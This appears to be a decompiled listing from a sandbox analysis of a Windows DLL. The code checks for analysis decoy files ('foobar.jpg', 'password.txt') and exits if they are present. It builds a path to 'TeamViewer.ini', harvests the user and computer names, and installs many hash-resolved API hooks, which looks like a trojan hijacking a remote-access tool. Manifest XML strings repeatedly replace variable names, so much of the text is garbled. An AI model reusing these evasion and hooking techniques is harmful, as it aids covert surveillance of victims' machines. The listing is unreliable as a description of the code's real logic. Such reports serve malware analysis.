						_t505 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
						_t357 = E6F33A360(_t505, 0, 0);
						_t611 =  &_v936 + 0x18;
						M6F340520 = _t357; // executed
						__imp__SHGetSpecialFolderPathA(0,  &_v276, 0, 0); // executed
						if(_t357 != 0) {
							PathAddBackslashA( &_v292);
							_v948 = 0x626f6f66;
							_v944 = 0x6a2e7261;
							_v940 = 0x6770;
							_v938 = 0;
							wsprintfA( &_v556, "%s%s",  &_v292,  &_v948);
							_t633 = _t611 + 0x10;
							_t489 = GetFileAttributesA( &_v548); // executed
							if(_t489 != 0xffffffff) {
								ExitProcess(0);
							}
							_v956 = 0x74646f2e;
							_v952 = 0;
							wsprintfA( &_v548, "%s%s%s",  &_v284,  &_v940,  &_v956);
							_t611 = _t633 + 0x14;
							_t493 = GetFileAttributesA( &_v540); // executed
							if(_t493 != 0xffffffff) {
								_v947 = 0x7472;
								_v945 = 0x66;
								wsprintfA( &_v540, "%s%s%s",  &_v276,  &_v932,  &_v948);
								_t611 = _t611 + 0x14;
								if(GetFileAttributesA( &_v532) != 0xffffffff) {
									_v844 = 0x73736170;
									_v840 = 0x64726f77;
									_v836 = 0x73;
									_v939 = 0x7874;
									_v937 = 0x74;
									wsprintfA( &_v532, "%s%s%s",  &_v268,  &_v844,  &_v940);
									_t611 = _t611 + 0x14;
									if(GetFileAttributesA( &_v524) == 0xffffffff) {
										goto L11;
									} else {
										ExitProcess(0);
									}
								}
							}
						}
						L11:
						_t359 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						M6F340530 = _t359;
						_t360 = GetModuleFileNameA(0, _t359, 0x104);
						_t546 = M6F340530; // 0xa32c28
						M6F340538 = _t360;
						M6F34053C = PathFindFileNameA(_t546);
						_t362 = M6F340530; // 0xa32c28
						_t363 = E6F33A360(_t362, 0, 0);
						M6F340534 = _t363;
						L6F33C2EE();
						 *0x6f340278 = 0x11c;
						L6F33C34E();
						M6F340548 = E6F333280(0);
						_t365 = E6F333220(0);
						_t613 = _t611 + 0x14;
						M6F340544 = _t365;
						__imp__WTSGetActiveConsoleSessionId(0x6f340278, 0x6f340278, 0x11c);
						M6F3404E8 = _t365;
						_t366 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x400000
						if( *_t366 != 0x5a4d) {
							goto L131;
						} else {
							_t39 = _t366 + 0x3c; // 0x100
							_t601 =  *_t39 + _t366;
							if( *_t601 != 0x4550) {
								goto L131;
							} else {
								_v860 =  *((intOrPtr*)(_t601 + 0x58));
								_v976 =  *(_t601 + 8);
								_v844 = 0x104;
								_t369 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
								M6F3404F8 = _t369;
								if(_t369 != 0) {
									_t483 = GetUserNameW(_t369,  &_v844); // executed
									if(_t483 == 0) {
										_t484 = M6F3404F8; // 0xa56660
										 *_t484 = 0;
									}
								}
								_v856 = 0x104;
								_t371 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
								M6F340504 = _t371;
								if(_t371 != 0) {
									__imp__GetComputerNameExW(3, _t371,  &_v856); // executed
									_t371 = M6F340504; // 0xa59868
									if(_t371 == 0) {
										 *_t371 = 0;
										_t371 = M6F340504; // 0xa59868
									}
								}
								_t507 = M6F3404F8; // 0xa56660
								if(_t507 != 0) {
									M6F3404F4 = E6F33A2F0(_t507, 0, 0);
									_t371 = M6F340504; // 0xa59868
									_t613 = _t613 + 0xc;
								}
								if(_t371 != 0) {
									_t481 = E6F33A2F0(_t371, 0, 0);
									_t613 = _t613 + 0xc;
									M6F340500 = _t481;
								}
								_t373 = HeapAlloc(GetProcessHeap(), 8, 0x105);
								M6F3404CC = _t373;
								if(_t373 != 0) {
									_t531 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
									wsprintfA(_t373, "%s%s%s", _t531, "TeamViewer", ".ini");
									_t576 = M6F3404CC; // 0xa32d38
									_t480 = E6F33A360(_t576, 0, 0);
									_t613 = _t613 + 0x20;
									M6F3404D0 = _t480;
								}
								if(_v860 == 0x435a88 || _v976 == 0x4b4ca51f) {
									_push( &M6F3404F0);
									"\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = 1;
									M6F3404AC = E6F333390();
									_t375 = E6F331D50(0x77d938, _t601);
									M6F340580 = _t375;
									M6F340518 = _t375;
									M6F34054C = E6F331D50(0x7b16d4, _t601);
									M6F340570 = E6F331D50(0x7b7db0, _t601);
									M6F340550 = E6F331D50(0x7725be, _t601);
									M6F340554 = E6F331D50(0x7725bc, _t601);
									M6F340574 = E6F331D50(0x7b701c, _t601);
									M6F340578 = E6F331D50(0x7a2d08, _t601);
									M6F34057C = E6F331D50(0x7b70d8, _t601);
									M6F340558 = E6F331D50(0x7a304c, _t601);
									M6F34055C = E6F331D50(0x749a58, _t601);
									M6F340560 = E6F331D50(0x74b970, _t601);
									"voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = E6F331D50(0x7b0408, _t601);
									M6F340568 = E6F331D50(0x77ec48, _t601);
									M6F34056C = E6F331D50(0x74cddc, _t601);
									_t390 = E6F33A2F0(E6F331D50(0x7b4550, _t601), 0, 0);
									M6F3404DC = _t390;
									M6F3404E0 = lstrlenA(_t390);
									M6F340584 = E6F331D50(0x77a5b8, _t601);
									M6F3404D8 = E6F33A2F0(E6F331D50(0x7ad0d4, _t601), 0, 0);
									M6F3404D4 = E6F33A2F0(E6F331D50(0x7adf00, _t601), 0, 0);
									M6F340588 = E6F331D50(0x772a50, _t601);
									 *0x6f34047c = E6F33A2F0(E6F331D50(0x772af0, _t601), 0, 0);
									_t400 = GetCommandLineA();
									_t508 =  &_v868;
									_v868 = 0;
									_t605 = E6F33A3D0(_t400,  &_v868);
									_t618 = _t613 + 0xdc;
									if(_t605 != 0) {
										CharLowerA( *_t605);
										_t575 = _v868;
										if(_t575 > 1) {
											_t596 = 1;
											do {
												if(_t596 >= _t575 - 1) {
													L34:
													_t476 =  *((intOrPtr*)(_t605 + _t596 * 4));
													_t508 =  *_t476;
													__eflags = _t508 - 0x6b;
													if(_t508 != 0x6b) {
														L37:
														__eflags = _t508 - 0x66;
														if(_t508 == 0x66) {
															__eflags =  *(_t476 + 1);
															if( *(_t476 + 1) == 0) {
																M6F3404B8 = 1;
															}
														}
													} else {
														__eflags =  *(_t476 + 1);
														if( *(_t476 + 1) != 0) {
															goto L37;
														} else {
															M6F3404B4 = 1;
														}
													}
												} else {
													_t477 =  *((intOrPtr*)(_t605 + _t596 * 4));
													if( *_t477 != 0x77 ||  *((intOrPtr*)(_t477 + 1)) != 0) {
														goto L34;
													} else {
														_t508 =  *(_t605 + 4 + _t596 * 4);
														_t596 = _t596 + 1;
														_t478 = StrToIntA(_t508);
														_t575 = _v868;
														M6F340514 = _t478;
													}
												}
												_t596 = _t596 + 1;
											} while (_t596 < _t575);
										}
										LocalFree(_t605);
									}
									_push(8);
									_push(0x6f340398);
									L6F33C2EE();
									_t548 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
									E6F332140(_t508, _t548, 1);
									_t403 = M6F3404F0; // 0xa54ab0
									_t509 = M6F340500; // 0xa45a70
									_t549 = M6F3404F4; // 0xa55c48
									_t404 = E6F333180(_t549, _t509, _t403);
									_t511 = M6F3404F0; // 0xa54ab0
									_v972 = 0x6467;
									_v970 = 0;
									M6F3404E4 = _t404 % 0x7fffffff;
									_t552 = M6F3404CC; // 0xa32d38
									_t407 = GetPrivateProfileIntA(_t511,  &_v972, 0, _t552);
									_t553 = M6F340524; // 0xa56118
									M6F3404BC = _t407; // executed
									_t408 = GetModuleHandleA(_t553); // executed
									"embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t408;
									_t410 = GetModuleHandleA(E6F331D50(0x77146c, _t601));
									_push(0x435a88);
									_t606 = _t410;
									_push(1);
									_push( &_v968);
									_push(_t606);
									_v968 = 0x3f82e705;
									_v964 = 0;
									_v960 = 0;
									_v956 = 0;
									E6F331DB0();
									_t413 = _v956;
									_t621 = _t618 + 0x2c;
									if(_t413 != 0) {
										M6F34058C = _t413;
									}
									_t415 = E6F33A2F0(E6F331D50(0x77d760, _t601), 0, 0);
									_t512 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
									_t589 = _t415;
									wsprintfA( &_v576, "%s%s", _t512, _t589);
									_t622 = _t621 + 0x24;
									HeapFree(GetProcessHeap(), 0, _t589);
									_t420 = LoadLibraryA( &_v568); // executed
									M6F3404A8 = _t420;
									if(E6F33B4C0() != 0) {
										ExitProcess(0);
									}
									_push(8);
									_push( &_v852);
									M6F340614 = 1;
									L6F33C2EE();
									_v860 = 8;
									_v872 = 0;
									_t423 = NtQuerySystemInformation(0x67,  &_v860, 8,  &_v872); // executed
									if(_t423 < 0 || _v888 != 8 || (_v872 & 0x00000002) == 0) {
										_t591 = 0;
									} else {
										_t591 = 1;
										_v992 = 1;
									}
									if(_t606 != 0) {
										_push(0x435a88);
										_push(1);
										_push( &_v984);
										_push(_t606);
										_v984 = 0x2e136e83;
										_v980 = 0;
										_v976 = 0;
										_v972 = 0;
										E6F331DB0();
										_t470 = _v972;
										_t632 = _t622 + 0x10;
										if(_t470 != 0) {
											"Level>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t470;
										}
										_t96 = _t591 + 0x435a88; // 0x435a88
										_v984 = 0xa1acb3a1;
										_v980 = E6F337C40;
										_v976 =  &M6F3405A4;
										_v972 = 0;
										_v968 = 0xd9ef7edb;
										_v964 = E6F3378B0;
										_v960 =  &M6F340594;
										_v956 = 0;
										_v952 = 0x75da5974;
										_v948 = E6F337C20;
										_v944 =  &M6F3405A0;
										_v940 = 0;
										_v936 = 0x2a081f08;
										_v932 = E6F338230;
										_v928 =  &M6F3405F8;
										_v924 = 0;
										_v920 = 0x71e40fdf;
										_v916 = E6F3382C0;
										_v912 =  &M6F3405FC;
										_v908 = 0;
										E6F331FA0(_t606,  &_v984, 5, _t96);
										_t622 = _t632 + 0x10;
									}
									_t424 = E6F331D50(0x771704, _t601);
									_t514 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
									wsprintfA( &_v592, "%s%s", _t514, _t424);
									_t623 = _t622 + 0x18;
									_t427 = LoadLibraryA( &_v584);
									M6F340490 = _t427;
									if(_t427 != 0) {
										_v856 = 0x1ee4afd;
										_v852 = E6F337F10;
										_v848 =  &M6F3405E8;
										_v844 = 0;
										_v840 = 0xcd967670;
										_v836 = E6F3380B0;
										_v832 =  &M6F3405EC;
										_v828 = 0;
										_v824 = 0xc640750c;
										_v820 = E6F338100;
										_v816 =  &M6F3405F0;
										_v812 = 0;
										_v808 = 0x856c5686;
										_v804 = E6F337E20;
										_v800 =  &M6F3405C0;
										_v796 = 0;
										_v792 = 0xd576e7bf;
										_v788 = E6F337E50;
										_v784 =  &M6F3405C4;
										_v780 = 0;
										_v776 = 0x4bdf2df3;
										_v772 = E6F337EC0;
										_v768 =  &M6F3405B8;
										_v764 = 0;
										_v760 = 0x25955ea4;
										_v756 = E6F337EE0;
										_v752 =  &M6F3405E0;
										_v748 = 0;
										_v744 = 0x576e0706;
										_v740 = E6F337E00;
										_v736 =  &M6F3405B0;
										_v732 = 0;
										_v728 = 0xa3bab257;
										_v724 = E6F337E00;
										_v720 =  &M6F3405B4;
										_v716 = 0;
										_v712 = 0xeb950520;
										_v708 = E6F337EF0;
										_v704 =  &M6F3405E4;
										_v700 = 0;
										_v696 = 0x983d21d0;
										_v692 = E6F337E90;
										_v688 =  &M6F3405C8;
										_v684 = 0;
										_v680 = 0xbd4f6953;
										_v676 = E6F337EA0;
										_v672 =  &M6F3405CC;
										_v668 = 0;
										_v664 = 0xc1059600;
										_v660 = E6F337EF0;
										_v656 =  &M6F3405BC;
										_v652 = 0;
										_v648 = 0x92d6cfa1;
										_v644 = E6F337EB0;
										_v640 =  &M6F3405D0;
										_v636 = 0;
										_v632 = 0xa710b547;
										_v628 = E6F337EF0;
										_v624 =  &M6F3405D4;
										_v620 = 0;
										_v616 = 0x35fe64ad;
										_v612 = E6F337DB0;
										_v608 =  &M6F3405A8;
										_v604 = 0;
										_v600 = 0x508fafbc;
										_v596 = E6F337DE0;
										_v592 =  &M6F3405AC;
										_v588 = 0;
										E6F331FA0(_t427,  &_v856, 0x11, _t591 + 0x435a88);
										_t568 = M6F340578; // 0x798f80
										_t189 = _t568 + 9; // 0x6854706f
										_v976 =  *_t189;
										_t463 = M6F340568; // 0x74cec0
										_t191 = _t463 + 0x1e; // 0x65006c
										_t623 = _t623 + 0x10;
										_v974 =  *_t191 & 0x0000ffff;
										_t193 = _t463 + 0x1e; // 0x65006c
										_t464 = M6F340574; // 0x784294
										_v972 =  *_t193 & 0x0000ffff;
										_t195 = _t464 + 1; // 0x61476e79
										_v970 =  *_t195;
										_v966 = 0x62;
										_v968 =  *_t464;
										_t199 = _t464 + 3; // 0x65746147
										_v964 =  *_t199;
										_v962 = 0;
										_t466 = FindWindowW( &_v976, 0); // executed
										_v964 = 0;
										_t468 = FindWindowW( &_v976, 0); // executed
										_t591 = _t466 + _t468;
										_v984 = _t591;
									}
									_t428 = E6F331D50(0x770adc, _t601);
									_t515 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
									wsprintfA( &_v584, "%s%s", _t515, _t428);
									_t624 = _t623 + 0x18;
									_t431 = LoadLibraryA( &_v576);
									M6F340494 = _t431;
									if(_t431 != 0) {
										_t208 = _t591 + 0x435a88; // 0x435a88
										_v968 = 0x1febfb51;
										_v964 = E6F337ED0;
										_v960 =  &M6F3405DC;
										_v956 = 0;
										_v952 = 0xa4bc5079;
										_v948 = E6F337EC0;
										_v944 =  &M6F3405D8;
										_v940 = 0;
										_v936 = 0x3fca0603;
										_v932 = E6F3383A0;
										_v928 =  &M6F340608;
										_v924 = 0;
										_v920 = 0x5fa6686b;
										_v916 = E6F3383D0;
										_v912 =  &M6F34060C;
										_v908 = 0;
										E6F331FA0(_t431,  &_v968, 4, _t208);
										_t624 = _t624 + 0x10;
									}
									_t432 = E6F331D50(0x7715e4, _t601);
									_t433 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
									wsprintfA( &_v576, "%s%s", _t433, _t432);
									_t625 = _t624 + 0x18;
									_t435 = LoadLibraryA( &_v568);
									M6F340498 = _t435;
									if(_t435 != 0) {
										_t228 = _t591 + 0x435a88; // 0x435a88
										_v960 = 0xa0428c41;
										_v956 = E6F337B70;
										_v952 =  &M6F340598;
										_v948 = 0;
										_v944 = 0x35ad950a;
										_v940 = E6F337BD0;
										_v936 =  &M6F34059C;
										_v932 = 0;
										E6F331FA0(_t435,  &_v960, 2, _t228);
										_t625 = _t625 + 0x10;
									}
									_t436 = E6F331D50(0x350b4, _t601);
